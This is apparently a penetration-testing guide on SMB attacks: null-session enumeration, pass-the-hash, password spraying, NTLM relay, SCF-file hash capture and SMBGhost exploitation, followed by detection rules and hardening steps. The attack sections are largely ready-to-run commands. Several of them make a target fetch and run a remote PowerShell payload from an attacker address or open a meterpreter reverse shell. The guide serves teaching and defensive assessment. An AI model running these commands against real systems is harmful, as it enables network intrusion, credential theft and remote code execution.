SMB Protocol Security: From Enumeration to Exploitation
Comprehensive guide to SMB protocol attacks including null sessions, pass-the-hash, forced authentication, relay attacks, and SMBGhost vulnerability exploitation.
Dec 11, 2025
Updated Dec 11, 2025
2 min read
SMBNetwork SecurityPass-the-HashNull SessionNTLM RelayRed TeamPenetration TestingSMBGhostCrackMapExec
Introduction
Server Message Block (SMB) is a network file sharing protocol that enables applications and users to access files, printers, and other resources on remote systems. Originally developed by IBM and later enhanced by Microsoft, SMB has become the backbone of Windows file sharing and is also implemented on Unix/Linux systems through Samba.
The SMB protocol operates on multiple layers and ports, creating a complex attack surface that penetration testers and red teams regularly target. Understanding SMB's architecture, common misconfigurations, and exploitation techniques is essential for both offensive security professionals and defenders.
SMB vulnerabilities and misconfigurations can provide effective initial access and lateral movement vectors in enterprise networks. From null session enumeration to sophisticated relay attacks, SMB exploitation techniques continue to evolve alongside security improvements.
Enterprise Network Gold Mine
SMB services are ubiquitous in corporate environments, making them prime targets for reconnaissance and exploitation. A single misconfigured SMB share or vulnerable SMB implementation can provide attackers with initial access, credential harvesting opportunities, or complete domain compromise.
Technical Background
SMB Protocol Evolution
SMB has evolved through several versions, each introducing new features and security improvements:
| Version | Release | Operating Systems | Key Features |
|---|---|---|---|
| SMBv1 | 1984 | Windows NT - 10 (deprecated) | Original implementation, numerous vulnerabilities |
| SMBv2 | 2006 | Windows Vista+, Server 2008+ | Performance improvements, reduced chattiness |
| SMB2.1 | 2010 | Windows 7, Server 2008 R2 | Large MTU support, client oplock leasing |
| SMB3.0 | 2012 | Windows 8, Server 2012 | SMB Direct (RDMA), multichannel, encryption |
| SMB3.1.1 | 2015 | Windows 10, Server 2016+ | Pre-authentication integrity, encryption improvements |
Port Architecture
SMB operates across different ports depending on the implementation:
Port 445 (SMB over TCP/IP)
- Direct SMB communication without NetBIOS layer
- Modern Windows default configuration
- Preferred target for most SMB attacks
Port 139 (SMB over NetBIOS)
- Legacy SMB implementation requiring NetBIOS session service
- Uses NBT (NetBIOS over TCP/IP)
- Common on older systems and Samba implementations
Related Ports
- Port 137: NetBIOS Name Service (UDP)
- Port 138: NetBIOS Datagram Service (UDP)
- Port 135: Microsoft RPC endpoint mapper (used with SMB/DCOM attacks)
Authentication Mechanisms
SMB supports multiple authentication protocols:
NTLMv1 (Legacy)
- Vulnerable to rainbow table attacks
- Deprecated but still encountered in legacy environments
- Easy to crack offline
NTLMv2
- Improved hash algorithm using HMAC-MD5
- Current default on Windows systems
- More resistant to cracking but still vulnerable to relay attacks
Kerberos
- Preferred authentication for domain-joined systems
- Mutual authentication between client and server
- Resistant to relay attacks but vulnerable to other attacks (Kerberoasting, etc.)
Enumeration Techniques
Identifying SMB Services
Using Nmap
# Basic SMB service detection
sudo nmap -p139,445 -sV -sC 10.10.11.45
# Comprehensive SMB enumeration
sudo nmap -p139,445 --script smb-protocols,smb-security-mode,smb-enum-shares,smb-enum-users 10.10.11.45
# Detect SMB version and signing configuration
sudo nmap -p445 --script smb2-security-mode,smb2-capabilities 10.10.11.45
# Check for known SMB vulnerabilities
sudo nmap -p445 --script smb-vuln* 10.10.11.45Example output:
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
Host script results:
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2026-05-06T13:16:04
|_ start_date: N/AUsing CrackMapExec
# Identify SMB version and signing status
crackmapexec smb 10.10.11.45
# Scan entire subnet
crackmapexec smb 10.10.11.0/24
# Check for SMB signing across network range
crackmapexec smb 10.10.11.0/24 --gen-relay-list relay-targets.txtNull Session Enumeration
Null sessions allow unauthenticated access to enumerate domain information on misconfigured systems.
Using RPCClient
# Connect with null session
rpcclient -U "" -N 10.10.11.45
# Enumerate users
rpcclient $> enumdomusers
user:[administrator] rid:[0x1f4]
user:[guest] rid:[0x1f5]
user:[svc-backup] rid:[0x641]
user:[svc-sql] rid:[0xa2b]
# Enumerate groups
rpcclient $> enumdomgroups
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Backup Operators] rid:[0x551]
# Query user details
rpcclient $> queryuser 0x641
User Name : svc-backup
Full Name : Backup Service Account
Home Drive : \\srv01\home$\svc-backup
Description : Service account for backup operations
# Enumerate shares
rpcclient $> netshareenum
netname: IPC$
remark: IPC Service (DEVSM)
path: C:\tmp
netname: backup
remark: Backup Share
path: C:\backupUsing SMBClient
# List shares with null session
smbclient -L //10.10.11.45 -N
# Connect to specific share
smbclient //10.10.11.45/backup -N
# Download all files recursively
smb> recurse ON
smb> prompt OFF
smb> mget *Using Enum4Linux
# Comprehensive null session enumeration
enum4linux -a 10.10.11.45
# Target specific enumeration types
enum4linux -U -G -S 10.10.11.45 # Users, Groups, Shares
# Modern Python implementation
enum4linux-ng -A 10.10.11.45 -oY output.yamlUsing SMBMap
# Enumerate shares with permissions
smbmap -H 10.10.11.45
# Recursively list directories
smbmap -H 10.10.11.45 -r backup
# Download specific file
smbmap -H 10.10.11.45 --download 'backup\passwords.txt'
# Upload file to writable share
smbmap -H 10.10.11.45 --upload '/tmp/payload.exe' 'share\payload.exe'Authenticated Enumeration
Using Valid Credentials
# CrackMapExec enumeration with credentials
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --shares
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --users
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --groups
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --loggedon-users
# SMBMap with credentials
smbmap -H 10.10.11.45 -u administrator -p 'Password123!' -d DOMAIN
# RPCClient with credentials
rpcclient -U 'DOMAIN/username%password' 10.10.11.45Domain Enumeration via SMB
# Enumerate domain users via SMB
crackmapexec smb 10.10.11.45 -u user -p 'password' --users | tee users.txt
# Extract user list for password spraying
cat users.txt | grep -oP '(?<=DOMAIN\\).*?(?=\s)' > userlist.txt
# Enumerate logged-on users across subnet
crackmapexec smb 10.10.11.0/24 -u admin -p 'password' --loggedon-usersExploitation Techniques
Null Session Attacks
Harvesting Information for Further Attacks
# Enumerate users for password spraying
rpcclient -U "" -N 10.10.11.45 -c "enumdomusers" | grep -oP '\[.*?\]' | grep -v '0x' > users.txt
# Enumerate password policy
rpcclient -U "" -N 10.10.11.45 -c "getdompwinfo"
min_password_length: 7
password_properties: 0x00000001
DOMAIN_PASSWORD_COMPLEX
# Enumerate shares for sensitive data
enum4linux -S 10.10.11.45 | grep -i "mapping"Accessing Sensitive Shares
# Access backup share
smbclient //10.10.11.45/backup -N
smb> ls
. D 0 Mon May 6 14:32:15 2026
.. D 0 Mon May 6 14:32:15 2026
credentials.txt A 116 Mon May 6 08:43:19 2026
database_backup.bak A 8388608 Mon May 6 07:12:33 2026
smb> get credentials.txt
getting file credentials.txt of size 116 as credentials.txtPass-the-Hash Attacks
Pass-the-Hash allows authentication using NTLM hashes instead of plaintext passwords.
Extracting NTLM Hashes
# Dump SAM hashes with CrackMapExec
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' --sam
# Dump NTDS.dit from Domain Controller
crackmapexec smb 10.10.11.10 -u administrator -p 'Password123!' --ntds
# Using Impacket secretsdump
secretsdump.py DOMAIN/administrator:[email protected]Pass-the-Hash Execution
# Authenticate using NTLM hash
crackmapexec smb 10.10.11.45 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe'
# Execute commands with PTH
crackmapexec smb 10.10.11.45 -u administrator -H '2b576acbe6bcfda7294d6bd18041b8fe' -x 'whoami'
# PSExec with hash
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe [email protected]
# WMIExec with hash
impacket-wmiexec -hashes aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe [email protected]SMBClient with Hash
# Access shares using hash
smbclient //10.10.11.45/C$ -U administrator --pw-nt-hash 2b576acbe6bcfda7294d6bd18041b8fe
# Using pth-toolkit
pth-smbclient //10.10.11.45/share -U administrator%aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8feRemote Code Execution via SMB
Using Impacket PsExec
# Standard execution
impacket-psexec DOMAIN/administrator:[email protected]
# Upload and execute custom binary
impacket-psexec DOMAIN/administrator:[email protected] -c /tmp/payload.exe
# Execute specific command
impacket-psexec DOMAIN/administrator:[email protected] 'ipconfig /all'Using SMBExec
# SMBExec (no RemComSvc)
impacket-smbexec DOMAIN/administrator:[email protected]
# Stealth execution without writing to disk
impacket-smbexec -hashes :2b576acbe6bcfda7294d6bd18041b8fe [email protected]Using WMIExec
# WMI-based execution
impacket-wmiexec DOMAIN/administrator:[email protected]
# Silent execution
impacket-wmiexec -nooutput DOMAIN/administrator:[email protected] 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'Using CrackMapExec
# Execute command on single host
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' -x 'whoami'
# Execute PowerShell command
crackmapexec smb 10.10.11.45 -u administrator -p 'Password123!' -X '$PSVersionTable'
# Execute across multiple hosts
crackmapexec smb 10.10.11.0/24 -u administrator -p 'Password123!' -x 'systeminfo' --exec-method smbexec
# Execute with specific method
crackmapexec smb 10.10.11.45 -u admin -p 'password' -x 'whoami' --exec-method atexecPassword Spraying
Preparing Username List
# Extract usernames from enumeration
crackmapexec smb 10.10.11.45 -u guest -p '' --users | grep -oP 'DOMAIN\\\\K[^\\s]+' > users.txt
# Clean and format list
cat users.txt | tr '[:upper:]' '[:lower:]' | sort -u > userlist_clean.txtExecuting Password Spray
# Spray single password
crackmapexec smb 10.10.11.45 -u userlist.txt -p 'Spring2026!' --continue-on-success
# Spray against domain controller
crackmapexec smb dc01.domain.local -u users.txt -p 'Password123!' --local-auth
# Check for common passwords
for pass in $(cat common_passwords.txt); do
echo "[*] Trying: $pass"
crackmapexec smb 10.10.11.45 -u users.txt -p "$pass" --continue-on-success | grep '[+]'
sleep 30 # Wait between attempts to avoid lockout
doneSmart Spraying to Avoid Lockout
# Query password policy first
crackmapexec smb 10.10.11.45 -u guest -p '' --pass-pol
# Spray with awareness of lockout threshold
# Example: 5 attempts threshold, spray 3 passwords with 60-minute gaps
crackmapexec smb 10.10.11.45 -u users.txt -p 'Spring2026!' --continue-on-success
sleep 3600 # Wait 60 minutes
crackmapexec smb 10.10.11.45 -u users.txt -p 'Summer2026!' --continue-on-successNTLM Relay Attacks
NTLM relay attacks exploit the lack of SMB signing to relay authentication attempts to other systems.
Identify Targets Without SMB Signing
# Scan for targets without SMB signing
crackmapexec smb 10.10.11.0/24 --gen-relay-list relay-targets.txt
# Verify specific target
nmap -p445 --script smb2-security-mode 10.10.11.45Configure Responder
# Disable SMB and HTTP servers in Responder (for relay)
vim /etc/responder/Responder.conf
# Set to Off:
SMB = Off
HTTP = Off
# Start Responder
sudo responder -I eth0 -wvSetup ntlmrelayx
# Basic relay to single target
impacket-ntlmrelayx -tf relay-targets.txt -smb2support
# Relay with command execution
impacket-ntlmrelayx -tf targets.txt -smb2support -c 'powershell -c "IEX(New-Object Net.WebClient).DownloadString(\"http://10.10.14.5/payload.ps1\")"'
# Relay to dump SAM database
impacket-ntlmrelayx -tf targets.txt -smb2support
# Interactive shell
impacket-ntlmrelayx -tf targets.txt -smb2support -i
# SOCKS proxy for tunneling
impacket-ntlmrelayx -tf targets.txt -smb2support -socksTrigger Authentication
# Social engineering (phishing link)
file://10.10.14.5/share/document.pdf
# Forced authentication via various protocols
# Via SMB
smbclient //victim-ip/share
# Via HTTP (if HTTP server enabled in Responder)
http://victim-ip/
# Via email with UNC path
\\10.10.14.5\share\image.jpgCatch and Relay
[*] SMBD-Thread-3: Connection from DOMAIN/[email protected] controlled, attacking target smb://10.10.11.50
[*] Authenticating against smb://10.10.11.50 as DOMAIN/USERNAME SUCCEED
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::Forced Authentication Attacks
Capturing NetNTLMv2 Hashes with Responder
# Start Responder on interface
sudo responder -I tun0 -wv
# Wait for authentication attempts from:
# - Name resolution failures
# - Mistyped UNC paths
# - Malicious file shares
# - Compromised web applications loading resources
# Example captured hash:
[SMB] NTLMv2-SSP Client : 10.10.11.45
[SMB] NTLMv2-SSP Username : DOMAIN\username
[SMB] NTLMv2-SSP Hash : username::DOMAIN:1122334455667788:9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D:0101000000000000...Cracking Captured Hashes
# Save hash to file
echo 'username::DOMAIN:1122334455667788:9A8B7C6D5E4F3A2B1C0D9E8F7A6B5C4D:...' > hash.txt
# Crack with Hashcat
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt
# Crack with John the Ripper
john --format=netntlmv2 hash.txt --wordlist=/usr/share/wordlists/rockyou.txtCreating Malicious File Shares for Authentication Capture
# Create malicious SCF file
cat > @exploit.scf << 'EOF'
[Shell]
Command=2
IconFile=\\10.10.14.5\share\icon.ico
[Taskbar]
Command=ToggleDesktop
EOF
# Upload to SMB share
smbclient //10.10.11.45/public -U username%password
smb> put @exploit.scfWhen users browse the share, Windows automatically attempts authentication to resolve the icon path.
SMBGhost (CVE-2020-0796)
SMBGhost is a critical vulnerability affecting SMBv3.1.1 compression mechanism on Windows 10 v1903/1909 and Server v1903/1909.
Vulnerability Check
# Using Nmap NSE script
nmap -p445 --script smb-vuln-cve-2020-0796 10.10.11.45
# Using Metasploit auxiliary module
use auxiliary/scanner/smb/smb_ms17_010
set RHOSTS 10.10.11.45
run
# Manual check with SMBv3 packet
python3 cve-2020-0796-check.py 10.10.11.45Exploitation
# Using public exploit
git clone https://github.com/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC
# Configure exploit
python3 exploit.py -ip 10.10.11.45 -c "C:\\temp\\payload.exe"
# Using Metasploit (if module available)
use exploit/windows/smb/cve_2020_0796_smbghost
set RHOSTS 10.10.11.45
set LHOST 10.10.14.5
set payload windows/x64/meterpreter/reverse_tcp
exploitDetection and Monitoring
Network Detection
Signature-Based Detection
# Snort rule for SMBGhost
alert tcp any any -> any 445 (msg:"SMBGhost CVE-2020-0796 Compression Exploit"; content:"|fc534d42|"; depth:4; content:"|33000000|"; distance:8; within:4; sid:1000001;)
# Suricata rule for NTLM relay
alert smb any any -> any 445 (msg:"Possible NTLM Relay Attack"; flow:to_server,established; content:"NTLMSSP"; sid:1000002;)Zeek/Bro Detection
# Zeek/Bro Detection Script
# Detect excessive SMB enumeration
event smb_tree_connect(c: connection, hdr: SMB::Header, path: string)
{
local src_ip = c$id$orig_h;
if (|tree_connects[src_ip]| > 100)
NOTICE([$note=SMB_Enumeration,
$msg=fmt("Excessive SMB connections from %s", src_ip),
$conn=c]);
}Windows Event Log Monitoring
Event ID 4624: Account Logon
<QueryList>
<Query Id="0" Path="Security">
<Select Path="Security">
*[System[(EventID=4624)]]
and
*[EventData[Data[@Name='LogonType']='3']]
and
*[EventData[Data[@Name='AuthenticationPackageName']='NTLM']]
</Select>
</Query>
</QueryList>Event ID 5140: Network Share Access
# Monitor for unusual share access patterns
Get-WinEvent -FilterHashtable @{LogName='Security';ID=5140} |
Where-Object {$_.Properties[8].Value -match '\\\\C\$|\\\\ADMIN\$'} |
Select-Object TimeCreated, @{N='User';E={$_.Properties[1].Value}}, @{N='Share';E={$_.Properties[8].Value}}Event ID 4776: NTLM Authentication
Monitor for Pass-the-Hash attacks:
-- Splunk query
index=windows EventCode=4776 Error_Code=0x0
| stats count by Source_Workstation, User_Name
| where count > 50Behavioral Detection
Anomaly Detection Rules
# Sigma rule for SMB enumeration
title: Excessive SMB Share Enumeration
status: experimental
description: Detects potential SMB enumeration activity
logsource:
product: windows
service: security
detection:
selection:
EventID: 5140
timeframe: 5m
condition: selection | count() by Computer > 100
level: mediumCrackMapExec Execution Detection
# Sysmon Event ID 1: Process Creation
Get-WinEvent -FilterHashtable @{LogName='Microsoft-Windows-Sysmon/Operational';ID=1} |
Where-Object {$_.Properties[4].Value -match 'crackmapexec|cme\.exe'} |
Select-Object TimeCreated, @{N='CommandLine';E={$_.Properties[10].Value}}Mitigation and Hardening
Disable SMBv1
# Check SMBv1 status
Get-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
# Disable SMBv1 (Windows 10/Server 2016+)
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol -NoRestart
# Disable via PowerShell (older systems)
Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
# Disable via registry
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" SMB1 -Type DWORD -Value 0 -Force
# Reboot required
Restart-Computer -ForceEnable SMB Signing
# Enable SMB signing (client)
Set-SmbClientConfiguration -RequireSecuritySignature $true -Force
# Enable SMB signing (server)
Set-SmbServerConfiguration -RequireSecuritySignature $true -Force
# Verify configuration
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature, EnableSecuritySignatureGroup Policy Configuration
Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
- Microsoft network client: Digitally sign communications (always) = Enabled
- Microsoft network server: Digitally sign communications (always) = EnabledEnable SMB Encryption
# Enable SMB encryption for all shares
Set-SmbServerConfiguration -EncryptData $true -Force
# Enable encryption for specific share
Set-SmbShare -Name "SensitiveData" -EncryptData $true
# Verify encryption status
Get-SmbShare | Select-Object Name, EncryptDataRestrict Anonymous Access
# Disable null session enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RestrictAnonymous" -Value 2
# Disable anonymous share enumeration
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" -Name "RestrictNullSessAccess" -Value 1
# Remove Everyone from share permissions
# Review all shares for excessive permissions
Get-SmbShare | Get-SmbShareAccessNetwork Segmentation
# Firewall rules to restrict SMB access (Linux iptables)
iptables -A INPUT -p tcp --dport 445 -s 10.10.11.0/24 -j ACCEPT
iptables -A INPUT -p tcp --dport 445 -j DROP
# Windows Firewall rule
New-NetFirewallRule -DisplayName "Block SMB from Internet" -Direction Inbound -Protocol TCP -LocalPort 445 -RemoteAddress Internet -Action Block
# Block SMB at perimeter
# Configure edge firewall to drop TCP 445, 139, and UDP 137-138Implement NTLM Restrictions
# Disable NTLM authentication domain-wide (Group Policy)
# Computer Configuration > Windows Settings > Security Settings > Local Policies > Security Options
# Network security: Restrict NTLM: NTLM authentication in this domain = Deny all
# Audit NTLM usage before enforcing
# Network security: Restrict NTLM: Audit NTLM authentication in this domain = Enable all
# Monitor Event ID 8004 for NTLM usage
Get-WinEvent -LogName 'Microsoft-Windows-NTLM/Operational' |
Where-Object {$_.Id -eq 8004}Credential Protection
# Enable Credential Guard (Windows 10 Enterprise/Server 2016+)
# Requires UEFI, Secure Boot, and virtualization-based security
# Check if Credential Guard is enabled
Get-ComputerInfo | Select-Object DeviceGuardSecurityServicesConfigured
# Enable via Group Policy
# Computer Configuration > Administrative Templates > System > Device Guard
# Turn On Virtualization Based Security = Enabled
# Credential Guard Configuration = Enabled with UEFI lock
# Enable LSA Protection (PPL)
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name "RunAsPPL" -Value 1
# Disable credential caching
Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" -Name "CachedLogonsCount" -Value 0Verification and Testing
Security Posture Assessment
# Scan for SMB vulnerabilities
nmap -p139,445 --script smb-vuln-* 10.10.11.0/24
# Test for null sessions
enum4linux -a 10.10.11.45 | grep -i "null session"
# Verify SMB signing
crackmapexec smb 10.10.11.0/24 --gen-relay-list vulnerable.txtCompliance Checks
# Verify SMBv1 is disabled
Get-WindowsFeature FS-SMB1
Get-SmbServerConfiguration | Select-Object EnableSMB1Protocol
# Verify SMB signing is enabled
Get-SmbServerConfiguration | Select-Object RequireSecuritySignature
# Verify SMB encryption is enabled for sensitive shares
Get-SmbShare | Where-Object {$_.Name -match 'Finance|HR|Executive'} | Select-Object Name, EncryptData
# Check anonymous access restrictions
Get-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Control\Lsa" -Name RestrictAnonymousPenetration Testing Checklist
- Identify SMB services and versions (Nmap, CrackMapExec)
- Test for null session access (RPCClient, Enum4Linux)
- Enumerate users, groups, and shares
- Test for common credential pairs (admin/admin, guest/)
- Attempt password spraying with common passwords
- Check for SMB signing disabled (relay attack potential)
- Test NTLM relay attacks against identified targets
- Deploy Responder for forced authentication capture
- Test Pass-the-Hash with captured or dumped credentials
- Attempt remote code execution via PSExec/WMIExec/SMBExec
- Check for SMBGhost vulnerability (CVE-2020-0796)
- Review share permissions for excessive access
- Document all findings with risk ratings and remediation steps
References
MITRE ATT&CK Techniques
- T1021.002 - Remote Services: SMB/Windows Admin Shares - SMB for lateral movement and remote access
- T1570 - Lateral Tool Transfer - Transferring tools via SMB shares
- T1557.001 - Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay - NTLM relay attacks
- T1187 - Forced Authentication - Forcing SMB authentication for hash capture
- T1110 - Brute Force - SMB credential brute-forcing
- T1003 - OS Credential Dumping - Dumping credentials via SMB access
- T1135 - Network Share Discovery - Enumerating SMB shares
Security Resources
- Microsoft: Overview of Server Message Block signing - SMB signing configuration
- SANS: Protecting Against SMB Attacks - SMB security best practices
- US-CERT: SMB Security Best Practices - Government security guidance
Vulnerabilities
- CVE-2020-0796 - SMBGhost - SMBv3 compression vulnerability
- CVE-2017-0144 - EternalBlue - SMBv1 remote code execution
- MS17-010 - Critical SMB vulnerabilities (WannaCry/NotPetya)
Tools Documentation
- CrackMapExec - SMB exploitation and lateral movement
- Impacket - Python SMB implementation and tools
- Responder - LLMNR/NBT-NS poisoning and hash capture
- Enum4Linux-ng - SMB enumeration tool
Next Steps
If SMB vulnerabilities are identified during assessment:
- Immediately disable SMBv1 across all Windows systems
- Enable SMB signing (preferably required, not just enabled)
- Implement SMB encryption for sensitive shares
- Restrict anonymous access through registry and Group Policy
- Deploy network segmentation to limit lateral SMB access
- Enable comprehensive logging for Event IDs 4624, 4776, 5140, 5145
- Conduct password audits to identify weak service account passwords
- Review related attack techniques:
Takeaway: SMB protocol security remains a critical component of Windows network defense. The combination of disabling SMBv1, enforcing SMB signing, enabling encryption, restricting anonymous access, and comprehensive monitoring provides defense-in-depth against SMB-based attacks. SMB hardening should be a key component of your Windows security program given the protocol's prevalence and potential for abuse in enterprise environments.
Last updated on
RDP Service Attacks and Exploitation
RDP attack and exploitation techniques including password attacks, session hijacking, pass-the-hash, BlueKeep vulnerability, and RDPGateway exploitation.
SMTP Service Attacks and Exploitation
SMTP exploitation guide covering user enumeration, open relay testing, email spoofing, brute-force authentication, and NTLM information disclosure.